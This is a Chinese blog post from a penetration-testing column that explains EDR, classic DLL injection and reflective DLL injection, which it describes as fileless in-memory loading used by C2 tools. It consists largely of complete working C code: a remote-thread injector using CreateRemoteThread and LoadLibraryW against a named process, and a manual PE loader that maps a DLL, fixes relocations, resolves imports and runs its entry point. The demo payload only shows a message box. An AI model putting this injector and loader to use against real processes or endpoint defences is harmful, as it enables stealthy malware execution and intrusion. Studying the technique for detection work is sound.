RDI无文件落地-反射DLL注入

最新推荐文章于 2024-06-15 15:22:21 发布
最新推荐文章于 2024-06-15 15:22:21 发布
阅读量493 收藏 9
点赞数 6
分类专栏: # 渗透测试 文章标签: 安全 windows c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/135708318
版权

概念简介

EDR

EDR技术不同于以往的基于边界、规则、策略为主的静态防御,是一种主动式端点安全防护技术,通过记录终端与网络事件(例如用户,文件,进程,注册表,内存和网络事件),结合已知的失陷指标(Indicators of Compromise,IOCs),运用行为分析和机器学习等技术来监测任何可能的安全威胁和恶意活动,并进行自动化的阻止、取证、补救和溯源,从而有效对端点进行防护。

dll注入

通过在目标进程中创建一个远程线程,通过向远程线程中传入对应的DLL,而直接将DLL加载到目标进程的虚拟空间之中

RDI

反射型DLL注入,即RDI是无文件落地,直接内存加载执行PE的技术,不必将其放置在主机的文件系统上,C2中经常使用。

常规dll注入

Dll2.dll

测试,弹个窗

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include<windows.h>
void f() {
    MessageBoxA(0, 0, 0, 0);
}
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        f();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

将dll注入到aaa2.exe中

//远程进程注入
#include <windows.h>
#include <stdio.h>
#include <TlHelp32.h>
typedef FARPROC
(WINAPI
	* pGetProcAddress)(
		_In_ HMODULE hModule,
		_In_ LPCSTR lpProcName
		);
typedef HMODULE
(WINAPI
	* pLoadLibraryA)(
		_In_ LPCSTR lpLibFileName
		);

BOOL injectDll(DWORD dwPID, LPCTSTR szDllPath);
BOOL mydllinject(DWORD pid, LPCTSTR szDllPath);
DWORD fun(LPCTSTR ProcessName);
int main()
{
	DWORD pid = 0;
	pid = fun(L"aaa2.exe");
	printf("pid:%u\n", pid);
	mydllinject(pid,L"Dll2.dll");
	system("pause");
	return 0;
}

BOOL mydllinject(DWORD pid, LPCTSTR szDllPath)
{
	HMODULE hMod = GetModuleHandle(L"kernel32.dll");
	pGetProcAddress pThreadProc= (pGetProcAddress)GetProcAddress(hMod, "LoadLibraryW");
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
	if (hProcess == NULL)
	{
		return FALSE;
	}
	DWORD size = (DWORD)(wcslen(szDllPath) + 1) * sizeof(TCHAR);
	LPVOID conAddr = VirtualAllocEx(hProcess, NULL, size, MEM_COMMIT, PAGE_READWRITE);
	if (conAddr == NULL)
	{
		return FALSE;
	}
	printf("add:%x", conAddr);
	int writecon = WriteProcessMemory(hProcess, conAddr, (LPCVOID)szDllPath, size, NULL);
	if (writecon == 0)
	{
		printf("WriteProcessMemory:%d\n", GetLastError());
	}

	HANDLE thred = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pThreadProc, conAddr, 0, NULL);
	if (thred == NULL)
	{
		printf("CreateRemoteThread:%d\n", GetLastError());
	}
	WaitForSingleObject(thred, INFINITE);
}
DWORD fun(LPCTSTR ProcessName)
{
	HANDLE hProceessnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProceessnap == INVALID_HANDLE_VALUE)
	{
		printf_s("创建进行快照失败\n");
		return 0;
	}
	else
	{
		PROCESSENTRY32 pe32;
		pe32.dwSize = sizeof(pe32);
		BOOL hProcess = Process32First(hProceessnap, &pe32);
		while (hProcess)
		{
			if (_wcsicmp(ProcessName, pe32.szExeFile) == 0)
			{
				return pe32.th32ProcessID;
			}
			hProcess = Process32Next(hProceessnap, &pe32);
		}
	}
	CloseHandle(hProceessnap);
	return 0;
}

过程

  1. 过程程句柄
  2. 为线程函数的参数分配空间(这里的线程函数参数为需要注入的DLL的路径),然后将参数写入虚拟空间
  3. 加载kernel32.dll,从中获取LoadLibraryW的实际地址
  4. 在目标进程中创建远程线程,执行装载DLL的操作

注:

Windows上的应用进程大部分都装载了kernel32.dll这个DLL库,而这个库在各个进程中的装载地址是一样的,那么我们就可以通过GetModuleHandle直接在程序中拿到kernel32.dll,并通过GetProcAddress这个API来找到LoadLibrary这个函数的地址

LoadLibrary函数是需要参数的,这个参数也就是DLL文件的路径,且在目标进程的内存中是没有的,所以需要我们自行分配内存和写入数据

RDI反射dll注入

手动解析PE并映射到目标进程再运行

#include<stdio.h>
#include <Windows.h>
//重定位表
typedef struct BASE_RELOCATION_BLOCK {
    DWORD page_addr;
    DWORD block_size;
} BASE_RELOCATION_BLOCK, * PBASE_RELOCATION_BLOCK;

//重定位项
typedef struct BASE_RELOCATION_ENTRY {
    USHORT offset : 12;
    USHORT type : 4;
} BASE_RELOCATION_ENTRY, * PBASE_RELOCATION_ENTRY;
typedef BOOL(WINAPI* DLLEntry)(HINSTANCE dll, DWORD reason, LPVOID reserved);
int main()
{
    printf("pid:%d\n", GetCurrentProcessId());

    // 获取当前模块
    PVOID imagebase = GetModuleHandleA(NULL);

    //将DLL字节读入内存缓冲区
    HANDLE dll = CreateFileA("D:\\c_project\\dlltest\\Debug\\Dll2.dll", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
    DWORD64 dll_size = GetFileSize(dll, NULL);
    LPVOID dll_bytes = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dll_size);
    DWORD out_size = 0;
    ReadFile(dll, dll_bytes, dll_size, &out_size, NULL);

    // 解析dll
    PIMAGE_DOS_HEADER dosheaders = (PIMAGE_DOS_HEADER)dll_bytes;
    PIMAGE_NT_HEADERS ntheaders = (PIMAGE_NT_HEADERS)((DWORD)dll_bytes + dosheaders->e_lfanew);
    SIZE_T dllImage_size = ntheaders->OptionalHeader.SizeOfImage;   //内存中对齐后的大小
 
    // 为DLL分配新的内存空间
    LPVOID dllbase = VirtualAlloc(NULL, dllImage_size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    printf("new memory addr:%p\n", dllbase);

    //计算得到dll基地址的偏移量,也就是实际的 DLL 加载地址减去 DLL 的首选加载地址
    DWORD delta_image_base = (DWORD)dllbase - (DWORD)ntheaders->OptionalHeader.ImageBase;

    // 将DLL节表头复制到新分配的DLL空间
    memcpy(dllbase, dll_bytes, ntheaders->OptionalHeader.SizeOfHeaders);

    // 将DLL节部分复制到新分配的DLL空间
    PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(ntheaders);
    for (size_t i = 0; i < ntheaders->FileHeader.NumberOfSections; i++,section++)
    {
        LPVOID section_destination = (LPVOID)((DWORD)dllbase + (DWORD)section->VirtualAddress);
        LPVOID section_bytes = (LPVOID)((DWORD)dll_bytes + (DWORD)section->PointerToRawData);
        memcpy(section_destination, section_bytes, section->SizeOfRawData);
    }

    //修复重定位
    IMAGE_DATA_DIRECTORY relocations = ntheaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
    DWORD relocation_table = relocations.VirtualAddress + (DWORD)dllbase;
    DWORD relocations_processed = 0;

    while (relocations_processed < relocations.Size)
    {
        PBASE_RELOCATION_BLOCK relocation_block = (PBASE_RELOCATION_BLOCK)(relocation_table + relocations_processed);
        relocations_processed += sizeof(BASE_RELOCATION_BLOCK);
        DWORD relocations_count = (relocation_block->block_size - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY);
        PBASE_RELOCATION_ENTRY relocation_entries = (PBASE_RELOCATION_ENTRY)(relocation_table + relocations_processed);

        for (DWORD i = 0; i < relocations_count; i++)
        {
            relocations_processed += sizeof(BASE_RELOCATION_ENTRY);

            if (relocation_entries[i].type == 0)
            {
                continue;
            }

            DWORD relocation_rva = relocation_block->page_addr + relocation_entries[i].offset;
            DWORD address_2_patch = 0;
            ReadProcessMemory(GetCurrentProcess(), (LPCVOID)((DWORD)dllbase + relocation_rva), &address_2_patch, sizeof(DWORD), NULL);
            address_2_patch += delta_image_base;
            memcpy((PVOID)((DWORD)dllbase + relocation_rva), &address_2_patch, sizeof(DWORD));
        }
    }

    //解析导入地址表
    IMAGE_DATA_DIRECTORY imports_directory = ntheaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    PIMAGE_IMPORT_DESCRIPTOR import_descriptor = (PIMAGE_IMPORT_DESCRIPTOR)(imports_directory.VirtualAddress + (DWORD)dllbase);
    LPCSTR libraryname = "";
    HMODULE library = NULL;
    while (import_descriptor->Name != NULL)
    {
        libraryname = (LPCSTR)import_descriptor->Name + (DWORD)dllbase;
        library = LoadLibraryA(libraryname);
        if (library)
        {
            PIMAGE_THUNK_DATA thunk = NULL;
            thunk = (PIMAGE_THUNK_DATA)((DWORD)dllbase + import_descriptor->FirstThunk);

            while (thunk->u1.AddressOfData != NULL)
            {
                if (IMAGE_SNAP_BY_ORDINAL(thunk->u1.Ordinal))
                {
                    LPCSTR functionOrdinal = (LPCSTR)IMAGE_ORDINAL(thunk->u1.Ordinal);
                    thunk->u1.Function = (DWORD)GetProcAddress(library, functionOrdinal);
                }
                else
                {
                    PIMAGE_IMPORT_BY_NAME functionName = (PIMAGE_IMPORT_BY_NAME)((DWORD)dllbase + thunk->u1.AddressOfData);
                    DWORD functionAddress = (DWORD)GetProcAddress(library, functionName->Name);
                    thunk->u1.Function = functionAddress;
                }
                ++thunk;
            }
        }
        import_descriptor++;
    }

    //执行
    DLLEntry dllentry = (DLLEntry)((DWORD)dllbase + ntheaders->OptionalHeader.AddressOfEntryPoint);
    (*dllentry)((HINSTANCE)dllbase, DLL_PROCESS_ATTACH, 0);
    CloseHandle(dll);
    HeapFree(GetProcessHeap(), 0, dll_bytes);
    return 0;
}

效果如下
在这里插入图片描述

过程

1、将原始DLL文件加载至内存缓冲区;

2、解析DLL标头并获取SizeOfImage;

3、为DLL分配新的内存空间,大小为SizeOfImage;

4、将DLL头和PE节复制到中分配的内存空间;

5、执行重定位;

6、加载DLL导入的库,解析导入地址表(IAT);

7、调用DLL

coleak
关注
  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
dll注入浅析
MusicMan
05-10 772
转载自:https://www.anquanke.com/post/id/86671 【技术分享】DLL注入那些事 发布时间:2017-08-22 11:06:09 译文声明 本文是翻译文章,文章原作者,文章来源:blog.deniable.org 原文地址:http://blog.deniable.org/blog/2017/07/16/inject-all-the-things 译...
多种DLL注入技术原理介绍
热门推荐
顺其自然~专栏
11-06 3万+
本文中我将介绍DLL注入的相关知识。不算太糟的是,DLL注入技术可以被正常软件用来添加/扩展其他程序,调试或逆向工程的功能性;该技术也常被恶意软件以多种方式利用。这意味着从安全角度来说,了解DLL注入的工作原理是十分必要的。 不久前在为攻击方测试(目的是为了模拟不同类型的攻击行为)开发定制工具的时候,我编写了这个名为“injectAllTheThings”的小工程的大...
DLL注入
weixin_51313054的博客
10-20 6614
DLL注入DLL注入原理dll注入实现过程功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 DLL注入原理 在Windows操作系统中,运行的每一个进程都生活在自己的程序空间中(保护模式),每一个进程都认为自己拥有整个机器的控制权,
修改jar 注入_反射DLL注入工具-sRDI
weixin_39858298的博客
10-21 322
反射DLL注入 DLL 注入首先,我们需要了解什么是反射DLL注入DLL 注入就是将 DLL(动态链接库,是一个包含可由多个程序,同时使用的代码和数据的库。例如,在 Windows 操作系统中,Comdlg32.dll 执行与对话框有关的常见函数。)放进某个进程的地址空间里,让它成为那个进程的一部分。要实现 DLL 注入,首先需要打开目标进程。DLL 注入也被很多合法软件广泛的使用,但恶意软...
驱动开发:内核远程线程实现DLL注入
CSDN
06-22 6164
在笔者上一篇文章`《驱动开发:内核RIP劫持实现DLL注入》`介绍了通过劫持RIP指针控制程序执行流实现插入DLL的目的,本章将继续探索全新的注入方式,通过`NtCreateThreadEx`这个内核函数实现注入DLL的目的,需要注意的是该函数在微软系统中未被导出使用时需要首先得到该函数的入口地址,`NtCreateThreadEx`函数最终会调用`ZwCreateThread`,本章在寻找函数的方式上有所不同,前一章通过内存定位的方法得到所需地址,本章则是通过解析导出表实现。
驱动开发:内核RIP劫持实现DLL注入
CSDN
06-16 7413
本章将探索内核级DLL模块注入实现原理,DLL模块注入在应用层中通常会使用`CreateRemoteThread`直接开启远程线程执行即可,驱动级别的注入有多种实现原理,而其中最简单的一种实现方式则是通过劫持EIP的方式实现,其实现原理可总结为,挂起目标进程,停止目标进程EIP的变换,在目标进程开启空间,并把相关的指令机器码和数据拷贝到里面去,然后直接修改目标进程EIP使其强行跳转到我们拷贝进去的相关机器码位置,执行相关代码后,然后再次跳转回来执行原始指令集。
2020-11-24(dll注入的N种搞法)
寻梦&之璐
11-24 1074
所谓DLL注入,本来是软件用于向其他程序添加/扩展功能、调试或逆向工程的一种合法技术。不过,后来恶意软件也常用这种方式来干坏事。因此,这意味着从安全的角度来看,我们必须知道DLL注入是如何工作的。 之前,当我开始开发Red Team的定制工具(为了模拟不同类型的攻击者)时,我完成了这个小项目的大部分代码,并将该项目命名为“injectAllTheThings”。如果你想看一些使用DLL注入的具体示例,请访问这里。如果你想了解DLL注入,该项目也会很有帮助。实际上,我已经在一个单一的Visual Studio
DLL注入的方式 (转载自看雪学院)
MusicMan
06-10 3059
DLL 注入技术的 N 种姿势 看雪学院 看雪学院,为IT专业人士、技术专家提供了一个民间交流与合作空间。 18 人赞同了该文章 本文中我将介绍DLL注入的相关知识。不算太糟的是,DLL注入技术可以被正常软件用来添加/扩展其他程序,调试或逆向工程的功能性;该技术也常被恶意软件以多种方式利用。这意味着从安全角度来说,了解DLL注入的工作原理是十分必要的。 不久前在为攻击方测试(目...
dll注入&代码注入
weixin_45880501的博客
09-17 1619
dll注入&代码注入 CreateRemoteThread 思路:在目标进程中申请一块内存并向其中写DLL路径,然后调用 CreateRemoteThread ,**(在自己进程中 创建远程线程到到目标进程)在目标进程中创建一个线程。**LoadLibrary()”函数作为线程的启动函数,来加载待注入DLL文件 ,LoadLibrary()参数 就是存放DLL路径的内存指针. 这时需要目标进程的4个权限(PROCESS_CREATE_THREAD,PROCESS_QUERY_INFORMATION
J-LinkRDI.Dll 动态链接文件
12-02
J-LinkRDI.Dll 动态链接文件
JCRCMDS:JCRCMDS.com 的 RDi/WDSCi 插件-开源
05-30
Craig Rutledge:http://www.jcrcmds.com/ RDi 8.0+ 更新站点:http://jcrcmds.sourceforge.net/eclipse/rdi8.0/ WDSC 7.0 更新站点:http://jcrcmds.sourceforge.net/ eclipse/wdsci7.0/ 存档的本地更新站点可以从...
4.7.3继电器输入冗余端子板XS-16RDI-RL-AC
03-23
4.7.3继电器输入冗余端子板XS-16RDI-RL-AC 介绍了关于4.7.3继电器输入冗余端子板XS-16RDI-RL-AC的详细说明,提供新大新产品的技术资料的下载。
RDI: Runtime Dependencies Installer-开源
04-24
RDI是一个库,使您的应用程序能够在运行时安装其依赖项。 非常适合面向插件的体系结构。 多种类型的部门:RPM,DEB,.so,.dll,RubyGems ...可以轻松扩展为新的类型。
4.7.5继电器输入冗余端子板XS-32RDI-RL
03-23
介绍了关于4.7.5继电器输入冗余端子板XS-32RDI-RL的详细说明,提供新大新产品的技术资料的下载。
打破安全设备孤岛,多源威胁检测与响应(XDR)如何构建一体化安全防线
安胜ANSCEN的博客
06-14 662
在企业常态化安全运营中,星盾多源威胁检测与响应(XDR)平台可灵活伸缩部署,融汇多源数据与能力,为安全运营团队提供统一的网络资产画像、自动化的威胁检测与响应、全面的安全态势、灵活可定义的指挥调度规范,助力企业建立高效的网络安全防御与响应体系。在网络安全防御体系的构建中,尽管部署了防火墙、入侵检测系统(IDS/IPS)、加密设备、网络流量分析工具等多种安全防御产品和措施,若这些产品之间无法进行有效的联动与协作机制,不仅降低了整体防护效果,还增加了管理的复杂性和成本。
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1451
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
红队攻防渗透技术实战流程:中间件安全:IIS&NGINX&APACHE&TOMCAT
最新发布
HACKONE的博客
06-15 129
当存在漏洞的Tomcat运行在Windows/Linux主机上, 且启用了HTTP PUT请求方法( 例如, 将readonly初始化参数由默认值设置为false) , 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件,JSP文件中的恶意代码将能被服务器执行, 导致服务器上的数据泄露或获取服务器权限。其2.4.0~2.4.29版本存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
厨房燃气安全新保障:红外点式可燃气体报警器的作用
BDjiance的博客
06-13 508
与传统的可燃气体报警器相比,点式报警器具有更高的灵敏度和更快的响应速度。通过实时监测空气中的可燃气体浓度,并在发现异常时及时发出报警信号,它有效降低了燃气泄漏和火灾事故的发生概率。同时,红外技术的应用也使得报警器具有更高的检测精度和更快的响应速度,为家庭安全提供了更加可靠的保障。例如,在某小区的居民家中,由于燃气灶使用不当导致燃气泄漏,幸运的是,家中安装了红外可燃气体报警器。其中,燃气泄漏和火灾是厨房安全的主要隐患。近年来,红外可燃气体报警器因其独特的点式报警和红外技术优势,逐渐成为厨房安全的新守护。
movq -8(%rbp) ,%rdi
03-26
movq -8(%rbp), %rdi 是一条x86汇编指令,它的作用是将位于寄存器 %rbp 偏移地址为 -8 的内存数据加载到寄存器 %rdi 中。 具体解释如下: - movq 是一个汇编指令,用于将数据从一个位置复制到另一个位置。 - -8(%rbp) 表示相对于寄存器 %rbp 的偏移地址为 -8 的内存位置。 - %rdi 是一个通用寄存器,用于存储函数的第一个参数。 因此,movq -8(%rbp), %rdi 的作用是将位于 %rbp - 8 的内存数据加载到 %rdi 寄存器中,通常用于函数参数的传递。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值